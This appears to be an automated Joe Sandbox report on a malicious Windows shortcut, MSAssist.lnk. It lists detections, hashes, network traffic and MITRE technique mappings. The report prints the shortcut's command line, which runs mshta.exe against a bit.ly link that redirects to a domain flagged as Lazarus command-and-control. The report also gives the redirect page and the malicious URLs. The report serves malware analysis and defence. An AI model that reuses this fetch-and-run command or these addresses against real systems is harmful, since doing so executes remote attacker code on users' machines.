Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MSAssist.lnk

Overview

General Information

Sample Name:MSAssist.lnk
Analysis ID:796588
MD5:483e3e0b1dceb4a5a13de65d3556c3fe
SHA1:e8b0785e58fd864c16fe4a58ee734d0fc93702e5
SHA256:b7533ae3057764c8734ebdea13e766eaa92ad38f7ab41bb267b9b44a550e1507
Tags:lnk
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected malicious lnk
Snort IDS alert for network traffic
Found URL in windows shortcut file (LNK)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
JA3 SSL client fingerprint seen in connection with other malware
Connects to a URL shortener service
IP address seen in connection with other malware

Classification

  • System is w10x64
  • mshta.exe (PID: 6132 cmdline: "C:\WINDOWS\system32\mshta.exe" https://bit.ly/35FlWc2 MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
MSAssist.lnkJoeSecurity_MalLnkYara detected malicious lnkJoe Security
    No Sigma rule has matched
    Timestamp:192.168.2.38.8.8.861787532033450 02/02/23-00:31:43.192577
    SID:2033450
    Source Port:61787
    Destination Port:53
    Protocol:UDP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: MSAssist.lnkReversingLabs: Detection: 56%
    Source: MSAssist.lnkVirustotal: Detection: 50%Perma Link
    Source: https://page.googledocpage.com/Avira URL Cloud: Label: malware
    Source: https://page.googledocpage.com/WiUAvira URL Cloud: Label: malware
    Source: https://page.googledocpage.com/IAvira URL Cloud: Label: malware
    Source: https://page.googledocpage.com/zAvira URL Cloud: Label: malware
    Source: https://page.googledocpage.com/UAvira URL Cloud: Label: malware
    Source: page.googledocpage.comVirustotal: Detection: 12%Perma Link
    Source: https://page.googledocpage.com/Virustotal: Detection: 12%Perma Link
    Source: unknownHTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49696 version: TLS 1.2

    Networking

    barindex
    Source: TrafficSnort IDS: 2033450 ET TROJAN Lazarus APT Related CnC Domain in DNS Lookup (page .googledocpage .com) 192.168.2.3:61787 -> 8.8.8.8:53
    Source: global trafficHTTP traffic detected: GET /35FlWc2 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bit.lyConnection: Keep-Alive
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: C:\Windows\System32\mshta.exeDNS query: name: bit.ly
    Source: Joe Sandbox ViewIP Address: 67.199.248.10 67.199.248.10
    Source: Joe Sandbox ViewIP Address: 67.199.248.10 67.199.248.10
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
    Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
    Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: mshta.exe, 00000000.00000002.524050952.000001D66BFE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bit.ly/
    Source: mshta.exe, 00000000.00000002.524050952.000001D66BFC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524050952.000001D66C017000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524050952.000001D66BFE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524050952.000001D66BFB0000.00000004.00000020.00020000.00000000.sdmp, MSAssist.lnkString found in binary or memory: https://bit.ly/35FlWc2
    Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bit.ly/35FlWc2...
    Source: mshta.exe, 00000000.00000002.524050952.000001D66BFC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bit.ly/35FlWc2B
    Source: mshta.exe, 00000000.00000002.524050952.000001D66BFB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bit.ly/35FlWc2C:
    Source: mshta.exe, 00000000.00000002.524050952.000001D66BFB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bit.ly/35FlWc2S
    Source: mshta.exe, 00000000.00000002.524417090.000001D66C1B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bit.ly/35FlWc2aHOMEDRIVE
    Source: mshta.exe, 00000000.00000002.524050952.000001D66BFC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bit.ly/35FlWc2r
    Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bit.ly/r3
    Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://page.googledocpage.com/
    Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://page.googledocpage.com/I
    Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://page.googledocpage.com/U
    Source: mshta.exe, 00000000.00000003.257329635.000001DE6E1B4000.00000004.00000020.00020000.00000000.sdmp, 35FlWc2[1].htm.0.drString found in binary or memory: https://page.googledocpage.com/WiU
    Source: mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://page.googledocpage.com/z
    Source: unknownDNS traffic detected: queries for: bit.ly
    Source: global trafficHTTP traffic detected: GET /35FlWc2 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bit.lyConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49696 version: TLS 1.2

    System Summary

    barindex
    Source: Yara matchFile source: MSAssist.lnk, type: SAMPLE
    Source: Initial fileStrings: https://bit.ly/35FlWc2%wN
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
    Source: MSAssist.lnkReversingLabs: Detection: 56%
    Source: MSAssist.lnkVirustotal: Detection: 50%
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
    Source: MSAssist.lnkLNK file: ..\..\..\..\..\WINDOWS\system32\mshta.exe
    Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4Jump to behavior
    Source: classification engineClassification label: mal84.rans.troj.winLNK@1/1@2/1
    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: mshta.exe, 00000000.00000002.524050952.000001D66C017000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524050952.000001D66BFE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524050952.000001D66C090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    1
    Spearphishing Link
    Windows Management InstrumentationPath InterceptionPath Interception1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Email Collection
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory12
    System Information Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
    Non-Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
    Remote System Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
    Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
    Ingress Tool Transfer
    SIM Card SwapCarrier Billing Fraud
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    MSAssist.lnk56%ReversingLabsShortcut.Trojan.BlueNoroff
    MSAssist.lnk50%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    page.googledocpage.com12%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://page.googledocpage.com/100%Avira URL Cloudmalware
    https://page.googledocpage.com/12%VirustotalBrowse
    https://page.googledocpage.com/WiU100%Avira URL Cloudmalware
    https://page.googledocpage.com/I100%Avira URL Cloudmalware
    https://page.googledocpage.com/z100%Avira URL Cloudmalware
    https://page.googledocpage.com/U100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    bit.ly
    67.199.248.10
    truefalse
      high
      page.googledocpage.com
      unknown
      unknownfalseunknown
      NameMaliciousAntivirus DetectionReputation
      https://bit.ly/35FlWc2false
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://bit.ly/35FlWc2C:mshta.exe, 00000000.00000002.524050952.000001D66BFB0000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://bit.ly/35FlWc2rmshta.exe, 00000000.00000002.524050952.000001D66BFC5000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://bit.ly/35FlWc2Smshta.exe, 00000000.00000002.524050952.000001D66BFB7000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://bit.ly/35FlWc2aHOMEDRIVEmshta.exe, 00000000.00000002.524417090.000001D66C1B0000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://page.googledocpage.com/Imshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                https://page.googledocpage.com/mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmptrue
                • 12%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                https://page.googledocpage.com/Umshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                https://bit.ly/35FlWc2Bmshta.exe, 00000000.00000002.524050952.000001D66BFC5000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://bit.ly/mshta.exe, 00000000.00000002.524050952.000001D66BFE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://page.googledocpage.com/WiUmshta.exe, 00000000.00000003.257329635.000001DE6E1B4000.00000004.00000020.00020000.00000000.sdmp, 35FlWc2[1].htm.0.drtrue
                    • Avira URL Cloud: malware
                    unknown
                    https://page.googledocpage.com/zmshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    https://bit.ly/35FlWc2...mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://bit.ly/r3mshta.exe, 00000000.00000002.524712330.000001DE6E170000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        67.199.248.10
                        bit.lyUnited States
                        396982GOOGLE-PRIVATE-CLOUDUSfalse
                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:796588
                        Start date and time:2023-02-02 00:30:44 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 7m 30s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:12
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample file name:MSAssist.lnk
                        Detection:MAL
                        Classification:mal84.rans.troj.winLNK@1/1@2/1
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .lnk
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        TimeTypeDescription
                        00:31:43API Interceptor1x Sleep call for process: mshta.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        67.199.248.10BankStatement-1674477258.dllGet hashmaliciousBrowse
                        • bit.ly/3J1os10
                        Bank_Of_America_Bank_Statement__6202068pdf.htaGet hashmaliciousBrowse
                        • bit.ly/3WGTfE4
                        http://bit.ly/3BBehNgGet hashmaliciousBrowse
                        • bit.ly/3BBehNg
                        http://92.35.66.155Get hashmaliciousBrowse
                        • bit.ly/javascript-api.js?version=latest&login=wapost&apiKey=R_fca1eba1db69cb6a6b0ff560ed62c8ab
                        http://23.129.64.210Get hashmaliciousBrowse
                        • bit.ly/javascript-api.js?version=latest&login=wapost&apiKey=R_fca1eba1db69cb6a6b0ff560ed62c8ab
                        http://23.129.64.149Get hashmaliciousBrowse
                        • bit.ly/javascript-api.js?version=latest&login=wapost&apiKey=R_fca1eba1db69cb6a6b0ff560ed62c8ab
                        http://23.129.64.137Get hashmaliciousBrowse
                        • bit.ly/javascript-api.js?version=latest&login=wapost&apiKey=R_fca1eba1db69cb6a6b0ff560ed62c8ab
                        http://bit.ly/3IgBV1cGet hashmaliciousBrowse
                        • bit.ly/3IgBV1c
                        New RFQ PDF.ppamGet hashmaliciousBrowse
                        • bit.ly/aXkVPnTMXsq15
                        New PO-0183HT PDF.ppamGet hashmaliciousBrowse
                        • bit.ly/aXzovafQOBF27
                        New RFQ PDF.ppamGet hashmaliciousBrowse
                        • bit.ly/ayVreJYnrrX14
                        New PO-0183HT PDF.ppamGet hashmaliciousBrowse
                        • bit.ly/adDIcLEBGae21
                        New PO-0183HT PDF.ppamGet hashmaliciousBrowse
                        • bit.ly/aYqFdXgsoCB20
                        New PO-0183HT PDF.ppamGet hashmaliciousBrowse
                        • bit.ly/albhKoifAMz22
                        New RFQ PDF.ppamGet hashmaliciousBrowse
                        • bit.ly/aKMbRpAFXeS4
                        New RFQ PDF.ppamGet hashmaliciousBrowse
                        • bit.ly/aDlvUffdiSd8
                        New RFQ PDF.ppamGet hashmaliciousBrowse
                        • bit.ly/abKuaKhJgGc12
                        New RFQ PDF.ppamGet hashmaliciousBrowse
                        • bit.ly/aUvBnewTVbn13
                        New RFQ PDF.ppamGet hashmaliciousBrowse
                        • bit.ly/aBCESQxSDPe9
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        bit.lypo3P6XiL1j.exeGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://1drv.ms/w/s!AmHLPfLT0gWKeSkOi-PJigCgOdwGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://1drv.ms/w/s!AvjysAtIHaDAbbckaNWOeYbWYEIGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://1drv.ms/w/s!AgmZv4mIayhmcQOv4nGgzVScorcGet hashmaliciousBrowse
                        • 67.199.248.11
                        https://1drv.ms/w/s!ApoqfyGvCl1CarNDIp4XJEcDZhQGet hashmaliciousBrowse
                        • 67.199.248.11
                        https://1drv.ms/w/s!Av2X_TI0iGesdVmLCSC_aXZHcOQGet hashmaliciousBrowse
                        • 67.199.248.10
                        Voice Call Transmitter.htmlGet hashmaliciousBrowse
                        • 67.199.248.11
                        https://bit.ly/3CVqxbaGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://bit.ly/3H9siTfGet hashmaliciousBrowse
                        • 67.199.248.11
                        https://bit.ly/3iYdDSWGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://bit.ly/3H3BYyKGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://bit.ly/3Ho4MDyGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://bit.ly/3XxS4YyGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://bit.ly/3kC7V9CGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://bit.ly/3kC7V9CGet hashmaliciousBrowse
                        • 67.199.248.11
                        https://bit.ly/PhotoMrSalvadorFarrelsGet hashmaliciousBrowse
                        • 67.199.248.11
                        https://bit.ly/PhotoMrSalvadorFarrelsGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://bit.ly/3whG2X4Get hashmaliciousBrowse
                        • 67.199.248.11
                        BankStatement-1674477258.dllGet hashmaliciousBrowse
                        • 67.199.248.11
                        BankStatement-1674477258.dllGet hashmaliciousBrowse
                        • 67.199.248.10
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        GOOGLE-PRIVATE-CLOUDUSpo3P6XiL1j.exeGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://1drv.ms/w/s!AmHLPfLT0gWKeSkOi-PJigCgOdwGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://1drv.ms/w/s!AquTHBwcw80HgQN2jRpoSs_o-BazGet hashmaliciousBrowse
                        • 67.199.248.11
                        https://1drv.ms/w/s!AvjysAtIHaDAbbckaNWOeYbWYEIGet hashmaliciousBrowse
                        • 67.199.248.11
                        Wez57HGpHA.elfGet hashmaliciousBrowse
                        • 148.99.216.47
                        https://1drv.ms/w/s!AgmZv4mIayhmcQOv4nGgzVScorcGet hashmaliciousBrowse
                        • 67.199.248.11
                        https://1drv.ms/w/s!ApoqfyGvCl1CarNDIp4XJEcDZhQGet hashmaliciousBrowse
                        • 67.199.248.11
                        https://1drv.ms/w/s!Av2X_TI0iGesdVmLCSC_aXZHcOQGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://1drv.ms/w/s!AvKduNrfzZs-eenfIPWKO-Uj5wgGet hashmaliciousBrowse
                        • 67.199.248.10
                        Voice Call Transmitter.htmlGet hashmaliciousBrowse
                        • 67.199.248.11
                        https://bit.ly/3CVqxbaGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://bit.ly/3H9siTfGet hashmaliciousBrowse
                        • 67.199.248.11
                        https://bit.ly/3iYdDSWGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://bit.ly/3H3BYyKGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://bit.ly/3Ho4MDyGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://bit.ly/3XxS4YyGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://bit.ly/3kC7V9CGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://bit.ly/3kC7V9CGet hashmaliciousBrowse
                        • 67.199.248.11
                        https://bit.ly/PhotoMrSalvadorFarrelsGet hashmaliciousBrowse
                        • 67.199.248.11
                        https://bit.ly/PhotoMrSalvadorFarrelsGet hashmaliciousBrowse
                        • 67.199.248.10
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        37f463bf4616ecd445d4a1937da06e19Invoice_suspect.htmlGet hashmaliciousBrowse
                        • 67.199.248.10
                        Payment Details Report(01-31-2023).htmGet hashmaliciousBrowse
                        • 67.199.248.10
                        DEavgZUkWw.exeGet hashmaliciousBrowse
                        • 67.199.248.10
                        v0WJE3eugq.exeGet hashmaliciousBrowse
                        • 67.199.248.10
                        v0WJE3eugq.exeGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://netorg6283783-my.sharepoint.com/:b:/g/personal/eccadmin_eccog_org/EYTixuYEVddMgiD9r7Qxh84B7bjtQuXghkr6YhYIKU6_ag?e=4%3anz465M&at=9Get hashmaliciousBrowse
                        • 67.199.248.10
                        file.exeGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://app.box.com/s/4kdyl3nzsjjppx0mraq9ir7dg3ciu62fGet hashmaliciousBrowse
                        • 67.199.248.10
                        Invoice #DC 83-1462-K2-0.hTmGet hashmaliciousBrowse
                        • 67.199.248.10
                        file.exeGet hashmaliciousBrowse
                        • 67.199.248.10
                        Pago&Calendario.xlsGet hashmaliciousBrowse
                        • 67.199.248.10
                        Play_Now #U23ee#Ufe0f #U25b6#Ufe0f #U23ed#Ufe0f_20222322.htmGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://ihgoa.com/Get hashmaliciousBrowse
                        • 67.199.248.10
                        Wells_Fargo_Transfer_Receipt.pif.exeGet hashmaliciousBrowse
                        • 67.199.248.10
                        Shared Docs.shtmlGet hashmaliciousBrowse
                        • 67.199.248.10
                        EFT Payment - virtualintelligencebriefing.com.htmGet hashmaliciousBrowse
                        • 67.199.248.10
                        KUqLVaGmei.exeGet hashmaliciousBrowse
                        • 67.199.248.10
                        KUqLVaGmei.exeGet hashmaliciousBrowse
                        • 67.199.248.10
                        merchantsnat_Employee-Benefits_Handbook.htmGet hashmaliciousBrowse
                        • 67.199.248.10
                        https://decdesign.com.ar/Get hashmaliciousBrowse
                        • 67.199.248.10
                        No context
                        Process:C:\Windows\System32\mshta.exe
                        File Type:HTML document, ASCII text
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):5.159765412808528
                        Encrypted:false
                        SSDEEP:3:qVvzLURODccZ/vXbvx9nDyrDLCRKkKCECALRu3UQj2rEGqH8HbQFSXbKFvNGb:qFzLIeco3XLx92rDLElXECAL81jAE1HW
                        MD5:AA1E6618B0505B52BE213A1FD0E6789F
                        SHA1:9FAD86C2E997D331693BE1C43455518984CD3728
                        SHA-256:C94B2CD2E12B5E10811A8E7CB481D20CA52D54FFD505AD0A0DB4F56603F75B1D
                        SHA-512:FBA0D7E93B7C292ED5A34DB93FE2D8BEF20E6AE554C6C68C635CF097478F614D59363789DE7D59DEBC9E939CFE5BFA7CCFD05DE87361BB0B05A18AE480218BDF
                        Malicious:false
                        Reputation:low
                        Preview:<html>.<head><title>Bitly</title></head>.<body><a href="https://page.googledocpage.com/WiU+Q6cgIESl8BPJ/swFnyqX1uFiFiTyQY6yZbnIMwc=">moved here</a></body>.</html>
                        File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                        Entropy (8bit):3.240480772569893
                        TrID:
                        • Windows Shortcut (20020/1) 100.00%
                        File name:MSAssist.lnk
                        File size:720
                        MD5:483e3e0b1dceb4a5a13de65d3556c3fe
                        SHA1:e8b0785e58fd864c16fe4a58ee734d0fc93702e5
                        SHA256:b7533ae3057764c8734ebdea13e766eaa92ad38f7ab41bb267b9b44a550e1507
                        SHA512:a046eea9fb46b78f5cd49cd3505be1951ea6f088568dc70fce662f47d2d2a21d18871995f04803267ee20535b67476d3b40b4f3f10dbbb41f978440f195746f9
                        SSDEEP:12:8AlX6m/VnEXzzeMDGR22efeDJLgc4iN37+lbYqlTRUAN1r8:8Abtn46pefe5g6rab/nUAN
                        TLSH:3701270C1E8A1B22C375CD3754DFA316C9393D86FEA28F2A40E05BC96429100B5A6C2E
                        File Content Preview:L..................F........................................................;....P.O. .:i.....+00.../C:\...................V.1...........WINDOWS.@.............................................W.I.N.D.O.W.S.....Z.1...........system32..B.....................
                        Icon Hash:858db080828181ad

                        General

                        Relative Path:..\..\..\..\..\WINDOWS\system32\mshta.exe
                        Command Line Argument:https://bit.ly/35FlWc2
                        Icon location:
                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        192.168.2.38.8.8.861787532033450 02/02/23-00:31:43.192577UDP2033450ET TROJAN Lazarus APT Related CnC Domain in DNS Lookup (page .googledocpage .com)6178753192.168.2.38.8.8.8
                        TimestampSource PortDest PortSource IPDest IP
                        Feb 2, 2023 00:31:42.584640980 CET49696443192.168.2.367.199.248.10
                        Feb 2, 2023 00:31:42.584697008 CET4434969667.199.248.10192.168.2.3
                        Feb 2, 2023 00:31:42.584805012 CET49696443192.168.2.367.199.248.10
                        Feb 2, 2023 00:31:42.602818012 CET49696443192.168.2.367.199.248.10
                        Feb 2, 2023 00:31:42.602849007 CET4434969667.199.248.10192.168.2.3
                        Feb 2, 2023 00:31:42.665455103 CET4434969667.199.248.10192.168.2.3
                        Feb 2, 2023 00:31:42.665630102 CET49696443192.168.2.367.199.248.10
                        Feb 2, 2023 00:31:42.986608028 CET49696443192.168.2.367.199.248.10
                        Feb 2, 2023 00:31:42.986654043 CET4434969667.199.248.10192.168.2.3
                        Feb 2, 2023 00:31:42.987282038 CET4434969667.199.248.10192.168.2.3
                        Feb 2, 2023 00:31:42.987384081 CET49696443192.168.2.367.199.248.10
                        Feb 2, 2023 00:31:42.990633965 CET49696443192.168.2.367.199.248.10
                        Feb 2, 2023 00:31:42.990659952 CET4434969667.199.248.10192.168.2.3
                        Feb 2, 2023 00:31:43.106046915 CET4434969667.199.248.10192.168.2.3
                        Feb 2, 2023 00:31:43.106231928 CET49696443192.168.2.367.199.248.10
                        Feb 2, 2023 00:31:43.106270075 CET4434969667.199.248.10192.168.2.3
                        Feb 2, 2023 00:31:43.106331110 CET49696443192.168.2.367.199.248.10
                        Feb 2, 2023 00:31:43.107316017 CET4434969667.199.248.10192.168.2.3
                        Feb 2, 2023 00:31:43.107397079 CET49696443192.168.2.367.199.248.10
                        Feb 2, 2023 00:31:43.146764040 CET49696443192.168.2.367.199.248.10
                        Feb 2, 2023 00:31:43.146814108 CET4434969667.199.248.10192.168.2.3
                        TimestampSource PortDest PortSource IPDest IP
                        Feb 2, 2023 00:31:42.549252033 CET6162653192.168.2.38.8.8.8
                        Feb 2, 2023 00:31:42.568176985 CET53616268.8.8.8192.168.2.3
                        Feb 2, 2023 00:31:43.192576885 CET6178753192.168.2.38.8.8.8
                        Feb 2, 2023 00:31:43.216392994 CET53617878.8.8.8192.168.2.3
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Feb 2, 2023 00:31:42.549252033 CET192.168.2.38.8.8.80xcd11Standard query (0)bit.lyA (IP address)IN (0x0001)false
                        Feb 2, 2023 00:31:43.192576885 CET192.168.2.38.8.8.80x612dStandard query (0)page.googledocpage.comA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Feb 2, 2023 00:31:42.568176985 CET8.8.8.8192.168.2.30xcd11No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)false
